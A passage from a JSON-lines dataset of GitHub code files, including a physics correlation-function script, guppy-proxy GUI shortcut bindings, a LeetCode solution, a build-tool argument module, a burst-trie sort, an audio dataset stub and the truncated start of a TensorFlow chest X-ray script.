vals[q])) \n\n\t\t\t\t\t\tC_ACB[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\t\\\n\t\t\t\t\t\t * C[r,s] * np.exp(1.j*time[t2]*(vals[r] - vals[s])) \\\n\t\t\t\t\t\t * B[s,q] * np.exp(1.j*time[t1]*(vals[s] - vals[q]))\t\n\n\t\t\t\t\t\tC_CBA[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * C[q,r] * np.exp(1.j*time[t2]*(vals[q] - vals[r])) \\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * A[s,q]\t\t\n\n\n\tC_ABC /= Z\n\tC_BCA /= Z\n\tC_CAB /= Z\n\tC_BAC /= Z\n\tC_ACB /= Z\n\tC_CBA /= Z\n\n\tprint('End standard TCF')\n#=====================================================================\n\n#=====================================================================\n### save data to file\n\nif compute_PB:\n\t### KT_PT: order is [time, 
time, KT_PB.real, KT_PB.imag]\n\toutput= open('KT_PB_ABC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_ABC.real[i,j],KT_PB_ABC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_ABCp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_ABCp.real[i,j],KT_PB_ABCp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_CBA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_CBA.real[i,j],KT_PB_CBA.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_CBAp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_CBAp.real[i,j],KT_PB_CBAp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\nif compute_DKT:\n\t### KT: order is [time, KT]\n\toutput= open('KT.dat', 'w')\n\tfor i in range(nstep):\n\t\toutput.write('{} {} \\n'.format(time[i],KT[i]))\n\toutput.close()\n\n\t### DKT: order is [time, time, DKT.real, DKT.imag]\n\toutput= open('DKT.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKT.real[i,j],DKT.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTp1.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTp1.real[i,j],DKTp1.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\toutput= open('DKTp2.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTp2.real[i,j],DKTp2.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTpp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTpp.real[i,j],DKTpp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTpp2.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTpp2.real[i,j],DKTpp2.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\nif compute_std:\n\n\t### C_ABC: order is [time, time, C.real, C.imag]\n\toutput= open('C_ABC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_ABC.real[i,j],C_ABC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_BCA: order is [time, time, C.real, C.imag]\n\toutput= open('C_BCA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_BCA.real[i,j],C_BCA.imag[i,j]))\n\toutput.close()\n\n\t### C_CAB: order is [time, time, C.real, C.imag]\n\toutput= open('C_CAB.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_CAB.real[i,j],C_CAB.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_ACB: order is [time, time, C.real, C.imag]\n\toutput= open('C_ACB.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_ACB.real[i,j],C_ACB.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_CBA: order is [time, time, C.real, C.imag]\n\toutput= 
open('C_CBA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_CBA.real[i,j],C_CBA.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_BAC: order is [time, time, C.real, C.imag]\n\toutput= open('C_BAC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_BAC.real[i,j],C_BAC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t#=====================================================================\n\t### End program\nt_final=get_time.time()\nprint('DONE in {}s!!'.format(t_final-t_init))\n","repo_name":"litman90/Monodromy","sub_path":"scripts/exact_code_DKT.py","file_name":"exact_code_DKT.py","file_ext":"py","file_size_in_byte":20107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6821525459","text":"from guppyproxy.util import display_info_box, paste_clipboard\nfrom PyQt5.QtCore import pyqtSlot, QObject, Qt\nfrom PyQt5.QtWidgets import QShortcut \nfrom PyQt5.QtGui import QKeySequence\n\nclass GuppyShortcuts(QObject):\n \n ACT_NAV_FILTER_TEXT = 0\n ACT_NAV_FILTER_DROPDOWN = 1\n ACT_NAV_HISTORY = 2\n ACT_NAV_TREE = 3\n ACT_NAV_REPEATER = 4\n ACT_NAV_INTERCEPTOR = 5\n ACT_NAV_DECODER = 6\n ACT_NAV_DECODER_PASTE = 7\n ACT_NAV_FILTER_POP = 8\n ACT_OPEN = 9\n ACT_NEW = 10\n ACT_NAV_MACRO_ACTIVE = 11\n ACT_NAV_MACRO_INT = 12\n\n def __init__(self, guppy_window):\n QObject.__init__(self)\n self.guppy_window = guppy_window\n self.combos = {}\n\n self.add_shortcut(self.ACT_NAV_FILTER_TEXT,\n \"Navigate to filter text input\",\n self.nav_to_filter_text,\n QKeySequence(Qt.CTRL+Qt.Key_U))\n\n self.add_shortcut(self.ACT_NAV_FILTER_DROPDOWN,\n \"Navigate to filter dropdown input\",\n self.nav_to_filter_dropdown,\n QKeySequence(Qt.CTRL+Qt.Key_I))\n\n self.add_shortcut(self.ACT_NAV_FILTER_POP,\n \"Navigate to filters and pop most recent filter\",\n self.nav_to_filter_pop,\n QKeySequence(Qt.CTRL+Qt.Key_P))\n\n self.add_shortcut(self.ACT_NAV_HISTORY,\n \"Navigate to request list\",\n self.nav_to_history,\n QKeySequence(Qt.CTRL+Qt.Key_J))\n\n self.add_shortcut(self.ACT_NAV_TREE,\n \"Navigate to tree view\",\n self.nav_to_tree,\n QKeySequence(Qt.CTRL+Qt.Key_T))\n\n self.add_shortcut(self.ACT_NAV_REPEATER,\n \"Navigate to repeater\",\n self.nav_to_repeater,\n QKeySequence(Qt.CTRL+Qt.Key_R))\n\n self.add_shortcut(self.ACT_NAV_INTERCEPTOR,\n \"Navigate to interceptor\",\n self.nav_to_interceptor,\n QKeySequence(Qt.CTRL+Qt.Key_E))\n\n self.add_shortcut(self.ACT_NAV_DECODER,\n \"Navigate to decoder\",\n self.nav_to_decoder,\n QKeySequence(Qt.CTRL+Qt.Key_D))\n\n self.add_shortcut(self.ACT_NAV_DECODER_PASTE,\n \"Navigate to decoder and fill with clipboard\",\n self.nav_to_decoder_and_paste,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_D))\n\n self.add_shortcut(self.ACT_OPEN,\n \"Open datafile\",\n self.open_datafile,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_O))\n\n self.add_shortcut(self.ACT_NEW,\n \"New datafile\",\n self.new_datafile,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_N))\n\n self.add_shortcut(self.ACT_NAV_MACRO_ACTIVE,\n \"Navigate to active macros\",\n self.nav_to_active_macros,\n QKeySequence(Qt.CTRL+Qt.Key_M))\n\n self.add_shortcut(self.ACT_NAV_MACRO_INT,\n \"Navigate to intercepting macros\",\n self.nav_to_int_macros,\n QKeySequence(Qt.CTRL+Qt.Key_N))\n\n\n def add_shortcut(self, action, desc, func, key=None):\n sc = QShortcut(self.guppy_window)\n self.combos[action] = (sc, desc)\n 
sc.activated.connect(func)\n if key:\n sc.setKey(key)\n\n def set_key(self, action, key):\n sc = self.combos[action][0]\n sc.setKey(key)\n\n def get_desc(self, action):\n return self.combos[action][1]\n \n @pyqtSlot()\n def nav_to_filter_text(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.set_filter_is_text(True)\n self.guppy_window.historyWidget.filterWidg.entry.text_entry.textEntry.setFocus()\n\n @pyqtSlot()\n def nav_to_filter_dropdown(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.set_filter_is_text(False)\n\n @pyqtSlot()\n def nav_to_filter_pop(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.filterWidg.pop_phrase()\n\n @pyqtSlot()\n def nav_to_history(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_history()\n self.guppy_window.historyWidget.reqview.show_message()\n\n @pyqtSlot()\n def nav_to_tree(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_tree()\n\n @pyqtSlot()\n def nav_to_repeater(self):\n self.guppy_window.show_repeater_tab()\n\n @pyqtSlot()\n def nav_to_interceptor(self):\n self.guppy_window.show_interceptor_tab()\n\n @pyqtSlot()\n def nav_to_decoder(self):\n self.guppy_window.show_decoder_tab()\n\n @pyqtSlot()\n def nav_to_decoder_and_paste(self):\n self.guppy_window.show_decoder_tab()\n text = paste_clipboard()\n self.guppy_window.decoderWidget.decoder_input.editor.set_bytes(text.encode())\n\n @pyqtSlot()\n def open_datafile(self):\n self.guppy_window.settingsWidget.datafilewidg.open_datafile()\n \n @pyqtSlot()\n def new_datafile(self):\n self.guppy_window.settingsWidget.datafilewidg.new_datafile()\n\n @pyqtSlot()\n def nav_to_active_macros(self):\n self.guppy_window.show_active_macro_tab()\n\n @pyqtSlot()\n def nav_to_int_macros(self):\n self.guppy_window.show_int_macro_tab()\n","repo_name":"roglew/guppy-proxy","sub_path":"guppyproxy/shortcuts.py","file_name":"shortcuts.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"16"} +{"seq_id":"22853363067","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n if not head:\n return None\n \n queue_1 = []\n queue_2 = []\n\n while head:\n if head.val < x:\n queue_1.append(head)\n else:\n queue_2.append(head)\n head = head.next\n \n node = ListNode()\n start = node\n\n while queue_1:\n node.next = queue_1.pop(0)\n node = node.next\n\n while queue_2:\n node.next = queue_2.pop(0)\n node = node.next\n\n node.next = None\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"86-partition-list/86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24186532542","text":"\"\"\"\nArguments represent the primary tool for passing data between tasks.\nThey main class :class:`Argument` is a serializable key-value pair.\n\"\"\"\n\nfrom . 
import factory\nimport re\nimport json\nfrom .util import Serializable, UnusedArgFormatter, parse_assert, is_json_primitive, is_json_serializable\n\n\nARGUMENT_KEY_RE_STR = '[\\w\\d]+[\\w\\d_]*'\n\"\"\"A key of an argument must match this string\"\"\"\nARGUMENT_KEY_RE = re.compile('^' + ARGUMENT_KEY_RE_STR + '$')\n\"\"\"Compiled version of :data:`wasp.argument.ARGUMENT_KEY_RE`\"\"\"\n\n\nclass MissingArgumentError(Exception):\n \"\"\"\n Raised when an argument is expected to be present, but is missing.\n \"\"\"\n pass\n\n\nclass ArgumentCollection(dict):\n\n @classmethod\n def from_dict(cls, d):\n \"\"\"\n Creates a new :class:`ArgumentCollection` from a dict.\n Keys are expected to be strings.\n Value can be either :class:`Argument`, in which case they are\n used as such, or any other serializable type which is then\n wrappend within an :class:`Argument`.\n \"\"\"\n if d is None:\n return cls()\n ret = cls()\n for k, v in d.items():\n assert isinstance(k, str), 'Expected a dict with string keys.'\n if not isinstance(v, Argument):\n assert is_json_serializable(v), 'Values must be json serializable such that' \\\n 'they can be assigned to an Argument'\n ret.add(Argument(k).assign(v))\n else:\n ret.add(v)\n return ret\n\n def value(self, key, default=None):\n \"\"\"\n Returns the value of the argument associated with ``key``. If ``key`` is not in self,\n returns ``default``\n \"\"\"\n arg = self.get(key)\n if arg is None:\n return default\n return arg.value\n\n def add(self, *args, **kw):\n \"\"\"\n Adds arguments to the collection. Arguments can either be given in \\*args, or\n they can be specified using keyword arguments. Example::\n\n In [1]: foo = Argument('foo').assign('foo')\n In [2]: bar = Argument('bar').assign('bar')\n In [3]: col = ArgumentCollection()\n In [4]: col.add(foo, bar, foobar='test')\n In [5]: col\n Out[5]: {foo = foo, foobar = test, bar = bar}\n \"\"\"\n for arg in args:\n self._add_single(arg)\n for key, value in kw.items():\n self._add_single(Argument(key).assign(value))\n\n def update(self, E=None, **F):\n \"\"\"\n Same as ``dict.update`` but actually calls ``__setitem__``\n of this class.\n \"\"\"\n if E is not None:\n if hasattr(E, 'keys'):\n for k in E.keys():\n self[k] = E[k]\n else:\n for k, v in E:\n self[k] = v\n for k, v in F.items():\n self[k] = v\n\n def _add_single(self, arg):\n \"\"\"\n Adds a single Argument.\n :param arg: non-None object of type Argument.\n \"\"\"\n assert arg is not None\n self[arg.name] = arg\n\n def __setitem__(self, key, value):\n \"\"\"\n Sets self[key] to Argument(key, value=value).\n Otherwise self[key] is set to to value and value is expected to be of type Argument.\n \"\"\"\n key = str(key)\n if is_json_serializable(value) and not isinstance(value, Argument):\n value = Argument(key, value=value)\n assert isinstance(value, Argument), 'Can only set Argument in ArgumentCollection.__setitem__.'\n super().__setitem__(key, value)\n\n def isempty(self):\n \"\"\"\n Returns True if self has contains no items, False otherwise.\n \"\"\"\n return len(self) == 0\n\n def overwrite_merge(self, higher_priority):\n \"\"\"\n Merge ``higher_priority`` into self. If the key is already contained in self,\n overwrite the value of self.\n \"\"\"\n if higher_priority is None:\n return\n for k, v in higher_priority.items():\n self[k] = v\n\n def keep_merge(self, lower_priority):\n \"\"\"\n Merge ``lower_priority`` into self. 
If the key is already contained in self,\n keep the value of self.\n \"\"\"\n for k, v in lower_priority.items():\n if k not in self:\n self[k] = v\n\n @classmethod\n def load(cls, fpath):\n \"\"\"\n Loads the ArgumentCollection from a json file on the disc.\n \"\"\"\n d = {}\n with open(fpath, 'r') as f:\n try:\n d = json.load(f)\n except ValueError:\n raise ValueError('Invalid json file `{0}`'.format(fpath))\n self = cls()\n parse_assert(isinstance(d, dict), 'json file for ArgumentCollection must start with at dictionary.')\n for k, v in d.items():\n self.add(Argument(k).assign(v))\n return self\n\n def __repr__(self):\n return '{' + ', '.join('{0} = {1}'.format(k, v.value) for k, v in self.items()) + '}'\n\n\ndef collection(*args, **kw):\n \"\"\"\n Creates an ArgumentCollection from args and kw.\n :param args: Accepts list, dict ArgumentCollection or Argument\n :param kw: Calls ArgumentCollection.from_dict.\n :return: An ArgumentCollection created from the arguments\n \"\"\"\n col = ArgumentCollection()\n for arg in args:\n if isinstance(arg, list):\n col.overwrite_merge(collection(arg))\n elif isinstance(arg, ArgumentCollection):\n col.overwrite_merge(arg)\n elif isinstance(arg, dict):\n col.overwrite_merge(ArgumentCollection.from_dict(arg))\n elif isinstance(arg, Argument):\n col.add(arg)\n col.overwrite_merge(ArgumentCollection.from_dict(kw))\n return col\n\n\nclass Argument(Serializable):\n \"\"\"\n Serializable object which represents a key-value pair.\n It can be created from various sources, such as environment-variables, command line options\n or manually, see the :meth:`Argument.retrieve` method for more details.\n The Argument remembers they type of its first assigned value. Assigning another type requires\n changing the type settings. Attempting to set a value with different type will trigger\n an AssertionError.\n \"\"\"\n\n def __init__(self, key, value=None, type=None):\n \"\"\"\n Creats a new Argument with a given key. If value and/or type arguments are present,\n the value/type of this Argument will be set.\n\n :param key: Expected to be a string with length > 0 and match ARGUMENT_KEY_RE.\n :param value: If value is given, it will be immediately assigned to self. if type is None,\n the type(value) will be used.\n :param type: Sets the required type of the argument.\n \"\"\"\n self._key = key\n assert isinstance(key, str) and len(key) > 0\n self._value = None\n self._required_type = None\n self.set_value(value)\n if type is not None:\n self.use_type(type)\n m = ARGUMENT_KEY_RE.match(key)\n if not m:\n raise ValueError('Invalid argument key, expected `{0}`, found: `{1}`'.format(ARGUMENT_KEY_RE_STR, key))\n\n @property\n def key(self):\n return self._key\n\n @property\n def name(self):\n return self._key\n\n def to_json(self):\n d = super().to_json()\n d['value'] = factory.to_json(self._value)\n d['key'] = self.key\n return d\n\n @classmethod\n def from_json(cls, d):\n value = factory.from_json(d['value'])\n key = d['key']\n return cls(key, value=value, type=type(value))\n\n @property\n def type(self):\n \"\"\"\n :return: The type of the value of this Argument. Returns NoneType if the argument was never assigned\n any value.\n \"\"\"\n return self._required_type or type(self._value)\n\n def use_type(self, tp):\n \"\"\"\n Force the value to have a certain type. 
If a value which is ``not isinstance(value, tp)`` is passed\n to ``set_value()``, a TypeError is raised.\n \"\"\"\n assert tp is None or tp == str or \\\n tp == int or tp == bool or tp == float or tp == list or tp == dict or issubclass(tp, Serializable)\n self._required_type = tp\n self.set_value(self.value)\n\n def get_value(self):\n return self._value\n\n def set_value(self, value):\n \"\"\"\n Assigns ``value`` to self.value. If a type has already been set before, the new value\n must conform to the requirements of it (i.e. isinstance(value, type) must be True).\n Raises: TypeError if type conversion from value to the required type is not successful.\n \"\"\"\n if self._required_type is not None and value is not None:\n # self._value = (self._required_type)(value)\n if not isinstance(value, self._required_type):\n raise TypeError('Argument {0} must be of type {1}, but found type {2}!'.format(\n self.key, self._required_type.__name__, type(value).__name__))\n return\n self._value = value\n\n value = property(get_value, set_value)\n\n def _retrieve_from_single(self, arg):\n \"\"\"\n see :meth:`Argument.retrieve`.\n \"\"\"\n from .metadata import Metadata\n from .config import Config\n from .environment import Environment\n from .option import OptionsCollection\n\n if isinstance(arg, Environment):\n # environment variable\n return arg.get(self.key.upper())\n elif isinstance(arg, OptionsCollection):\n option = arg.all().get(self.key.lower(), None)\n if option:\n return option.value\n elif isinstance(arg, ArgumentCollection):\n v = arg.get(self.key)\n if v is not None:\n return v.value\n elif isinstance(arg, dict):\n # keyword argument\n return arg.get(self.key, None)\n elif isinstance(arg, Metadata):\n return arg.get(self.key)\n elif isinstance(arg, Config):\n return self._retrieve_from_single(arg.arguments)\n elif isinstance(arg, Serializable) or isinstance(arg, list) or is_json_primitive(arg):\n return arg\n return None\n\n def retrieve(self, *args, default=None):\n \"\"\"\n Retrieve the value of self from various sources.\n If multiple arguments are given, the value is retrieved\n from the first source, in which it was found.\n Possible sources are:\n\n * Environment (ctx.env, self.upperkey is used for retrieval)\n * OptionsCollection (ctx.options, self.lowerkey is used for retrieval)\n * a dict where key is used to retrive the value.\n * Metadata (can contain key-value pairs))\n * ArgumentCollection\n * Config (which contains an arguments section)\n * Serializable or primitive or list is assigned to the argument\n\n If the argument is not found in any given source, it's value is not set\n and thus None.\n\n :param default: Default value which is assigned, if the value was not found.\n :return: self\n \"\"\"\n for a in args:\n ret = self._retrieve_from_single(a)\n if ret is not None:\n self.value = ret\n break\n if self.value is None:\n self.value = default\n return self\n\n def retrieve_all(self, default=None):\n \"\"\"\n Retrieves the value of the Argument from:\n\n * ctx.arguments\n * ctx.options\n * ctx.config\n * ctx.meta\n * ctx.env\n\n The order defines the priority in which the various sources are considered.\n\n :param default: Default value which is assigned, if the value was not found.\n :return: self\n \"\"\"\n from wasp import ctx\n self.retrieve(ctx.arguments, ctx.options, ctx.config, ctx.meta, ctx.env, default=default)\n return self\n\n def require_type(self, tp):\n \"\"\"\n Sets the type of the Argument to tp. 
If the value does\n not conform to the type specified, a ValueError is raised.\n\n :param tp: asdf\n :return: self\n \"\"\"\n self._required_type = tp\n self.set_value(self._value)\n return self\n\n @property\n def is_empty(self):\n \"\"\"\n :return: True if self.value is None, False otherwise\n \"\"\"\n return self.value is None\n\n def assign(self, value):\n \"\"\"\n Assigns the value to self.\n\n :return: self\n \"\"\"\n self.value = value\n return self\n\n def __str__(self):\n return '{0} = `{1}`'.format(self.key, str(self.value))\n\n def __repr__(self):\n return '<Argument: {0} = `{1}`>'.format(self.key, str(self.value))\n\n\nfactory.register(Argument)\n\n\ndef format_string(string, arguments, all_required=False):\n \"\"\"\n Similiar to str.format. Formats a string using the values given in\n an argumentcollection. Example::\n\n In [1]: col = ArgumentCollection()\n In [2]: col['foo'] = 'bar'\n In [3]: col\n Out[3]: {foo = bar}\n In [4]: format_string('This is foo{foo}', col)\n Out[4]: 'This is foobar'\n\n :param string: String to be formatted. Use {argumentkey} for specifying the destination\n where the argument should be inserted.\n :param arguments: ArgumentCollection with values used for formatting the string.\n :param all_required: Defines whether a KeyError is raised if not all tags in\n the format string were found in arguments.\n :return: The formatted string.\n \"\"\"\n kw = {}\n for k, v in arguments.items():\n if v.type != str:\n continue\n kw[k] = v.value\n if all_required:\n s = string.format(**kw)\n else:\n s = UnusedArgFormatter().format(string, **kw)\n return s\n\n\ndef find_argumentkeys_in_string(string):\n \"\"\"\n :return: Returns all argument keys in a format string.\n\n Example::\n In [1]: find_argumentkeys_in_string('This is foo{foo} and {bar}')\n Out[1]: ['foo', 'bar']\n \"\"\"\n exp = re.compile('\\{(?P<argkey>' + ARGUMENT_KEY_RE_STR + ')\\}')\n return exp.findall(string)\n\n\ndef value(arg, default=None):\n \"\"\"\n Return the value of an Argument or create a new argument and immediately\n :meth:`Argument.retrieve_all()` it.\n :param arg: Either argument or string (to be used as key for creating a new Argument).\n :param default: Default value if no value could be retrieved.\n \"\"\"\n if isinstance(arg, Argument):\n if not arg.is_empty:\n ret = arg.value\n else:\n ret = arg.retrieve_all().value\n else:\n assert isinstance(arg, str), 'Expected Argument or str, got `{0}`'.format(type(arg).__name__)\n ret = Argument(arg).retrieve_all(default=default).value\n return ret\n\n\ndef arg(arg, value=None):\n \"\"\"\n Shortcut for creating an Argument with key = arg.\n\n :return: Argument(key)\n \"\"\"\n return Argument(arg, value=value)\n","repo_name":"raffber/wasp","sub_path":"src/wasp/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":15067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409508167","text":"import random\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data.dataset import Dataset\n\nSAMPLE_RATE = 16000\nEXAMPLE_WAV_MIN_SEC = 5\nEXAMPLE_WAV_MAX_SEC = 20\nEXAMPLE_DATASET_SIZE = 200\n\n\nclass RandomDataset(Dataset):\n def __init__(self, **kwargs):\n self.class_num = 48\n\n def __getitem__(self, idx):\n samples = random.randint(EXAMPLE_WAV_MIN_SEC * SAMPLE_RATE, EXAMPLE_WAV_MAX_SEC * SAMPLE_RATE)\n wav = torch.randn(samples)\n label = random.randint(0, self.class_num - 1)\n return wav, label\n\n def __len__(self):\n return EXAMPLE_DATASET_SIZE\n\n def 
collate_fn(self, samples):\n wavs, labels = [], []\n for wav, label in samples:\n wavs.append(wav)\n labels.append(label)\n return wavs, labels\n","repo_name":"s3prl/s3prl","sub_path":"s3prl/downstream/example/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1943,"dataset":"github-code","pt":"16"} +{"seq_id":"39269290001","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport array\n\nimport mkqsort\nfrom burstSettings import EOS, BURST_LIMIT\n\n\nclass Node(object):\n\n \"\"\"An inner node in a burst trie.\"\"\"\n\n def __init__(self):\n self.links = [None] * 256\n self.links[EOS] = Counter()\n\n def insert(self, data, pointer):\n c = data[pointer]\n if self.links[c] is None:\n self.links[c] = Container(self, c)\n self.links[c].insert(data, pointer + 1)\n \n def output(self, data, buffer, index = 0, prefix = bytearray()):\n \"\"\"Recursively output all children in alphabetical order\"\"\"\n for i, link in enumerate(self.links):\n if not link is None:\n prefix.append(i)\n index = link.output(data, buffer, index, prefix)\n prefix.pop()\n return index\n\n\nclass Counter(object):\n\n \"\"\"A leaf node counting the occurences of a string that has been\n fully consumed in the inner nodes.\n \"\"\"\n\n def __init__(self):\n self.count = 0\n \n def insert(self, data, pointer):\n self.count += 1\n \n def output(self, data, buffer, index, prefix):\n for x in xrange(self.count):\n buffer[index: index + len(prefix)] = prefix\n index += len(prefix)\n return index\n\n\nclass Container(object):\n\n \"\"\"A leaf node containing suffixes for strings that have the same\n prefix represented by the path from the root of the trie to this\n node. The suffixes are indexes to an array containing all the\n strings separated with EOS characters. The prefix is not stored\n explicitly.\n \"\"\"\n\n count = 0\n \n def __init__(self, parent, value):\n self.parent = parent\n self.value = value\n self.count = 0\n self.buf = array.array('i')\n Container.count += 1\n\n def insert(self, data, pointer):\n if self.count == BURST_LIMIT:\n node = self.burst(data)\n node.insert(data, pointer)\n self.parent.links[self.value] = node\n return\n self.buf.append(pointer)\n self.count += 1\n \n def burst(self, data):\n node = Node()\n for i in xrange(self.count):\n node.insert(data, self.buf[i])\n return node\n\n def output(self, data, buffer, index, prefix):\n if self.count > 1:\n mkqsort.sort(data, self.buf, self.count)\n for i in xrange(self.count):\n buffer[index: index + len(prefix)] = prefix\n index += len(prefix)\n j = self.buf[i]\n while True:\n buffer[index] = data[j]\n index += 1\n if data[j] == EOS:\n break\n j += 1\n return index\n\n\ndef read(filename):\n \"\"\"Read the contents of a file to a bytearray. 
Ensure the final\n character is EOS.\n \"\"\"\n data = bytearray(os.path.getsize(filename) + 1)\n with open(filename, 'rb') as file:\n file.readinto(data)\n if data[-2] == EOS:\n data.pop()\n finalEOS = True\n else:\n data[-1] = EOS\n finalEOS = False\n return data, finalEOS\n\ndef makeTrie(data):\n \"\"\"Scan data for string delimeters and insert the found strings to\n a burst trie.\n \"\"\"\n root = Node()\n start = end = count = 0\n while start < len(data):\n while data[end] != EOS:\n end += 1\n root.insert(data, start)\n count += 1\n start = end = end + 1\n return root\n\ndef main(filename = sys.argv[1]):\n data, finalEOS = read(filename)\n trie = makeTrie(data)\n outputBuffer = bytearray(len(data))\n trie.output(data, outputBuffer)\n if not finalEOS: #don't print a final EOS if there was none in the input\n outputBuffer.pop()\n sys.stdout.write(outputBuffer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"arpol/spa","sub_path":"burst.py","file_name":"burst.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20914760861","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom keras.applications.imagenet_utils import decode_predictions\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport collections\nfrom tensorflow.keras.preprocessing import image\nimport lime\nfrom lime import lime_image\nfrom skimage.segmentation import mark_boundaries\n\nfrom tensorflow.keras.utils import plot_model\n\n\ndef img_to_tensor(img):\n # img_tensor = image.img_to_array(img)\n img_tensor = np.array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n img_tensor /= 255.\n return img_tensor\n\n\ntypes = ['No_Finding', 'Enlarged_Cardiomediastinum', 'Cardiomegaly', 'Lung_Opacity', 'Lung_Lesion', 'Edema',\n 'Consolidation', 'Pneumonia', 'Atelectasis', 'Pneumothorax', 'Pleural_Effusion', 'Pleural_Other',\n 'Fracture', 'Support_Devices']\n\ndatagen = ImageDataGenerator(rescale=1. 
